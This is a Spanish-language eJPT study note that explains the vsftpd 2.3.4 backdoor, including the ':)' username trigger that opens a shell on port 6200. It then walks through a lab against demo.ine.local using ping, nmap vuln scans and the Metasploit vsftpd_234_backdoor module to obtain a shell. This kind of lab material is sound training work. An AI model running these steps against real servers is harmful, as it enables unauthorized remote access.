> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/metasploit-framework-msf/explotacion/explotacion-de-linux/explotacion-de-un-servidor-ftp-vulnerable.md).

# Explotación de un servidor FTP vulnerable

### 📡 ¿Qué es FTP?

**FTP** (File Transfer Protocol) es un protocolo de red utilizado para **compartir archivos** entre un cliente y un servidor. Se comunica mediante el **puerto TCP 21**.

* Comúnmente usado para transferir archivos a servidores web.
* Muchos sistemas Unix-like (como Linux) utilizan servidores FTP para gestión remota de archivos.

***

### 🧩 vsftpd: Very Secure FTP Daemon

* **vsftpd** es un servidor FTP diseñado para sistemas Unix/Linux.
* Es el **servidor FTP por defecto** en distribuciones como **Ubuntu, CentOS y Fedora**.
* Su nombre significa *Very Secure FTP Daemon*, y su objetivo es ofrecer seguridad y rendimiento.

***

### 🔥 Vulnerabilidad en vsftpd v2.3.4

La versión **vsftpd 2.3.4** contiene una **puerta trasera maliciosa** introducida mediante un ataque a la cadena de suministro, que permite a un atacante ejecutar comandos en el servidor.

#### ⚠️ Características de la vulnerabilidad:

* Fue resultado de una modificación del archivo original en el repositorio de descargas de vsftpd.
* Al conectarse con un **nombre de usuario que contiene `:)`**, el servidor abre un **shell en el puerto TCP 6200**.

***

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/Y61TWzDeDzRQS2WR1cZY" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/NqtsdBI4L8YIDoksUQwg" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Ejecute un escaneo nmap contra el objetivo:

**Dominio:**

```
nmap -sS -sV demo.ine.local
```

<figure><img src="/files/wamW8GQHde5QxYE0KejQ" alt=""><figcaption></figcaption></figure>

**Paso 4:** Hemos detectado que el servidor vsftpd se está ejecutando en la máquina objetivo. Usemos el script nmap vuln para escanear el objetivo.

**Dominio:**

```
nmap -p 21 --script vuln demo.ine.local
```

<figure><img src="/files/d8LzgPsyaxqLIlQqrVD4" alt=""><figcaption></figcaption></figure>

**Paso 5:** Vsftpd es una aplicación con puerta trasera. Usemos el módulo metasploit para explotar el objetivo.

**Comandos:**

```
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST demo.ine.local
exploit
```

<figure><img src="/files/czUGStILvayxXvJXhxVg" alt=""><figcaption></figcaption></figure>

¡Éxito!

#### Conclusión

En este laboratorio, explotamos un servidor FTP vulnerable usando un módulo metasploit y obtuvimos acceso de shell en el objetivo.
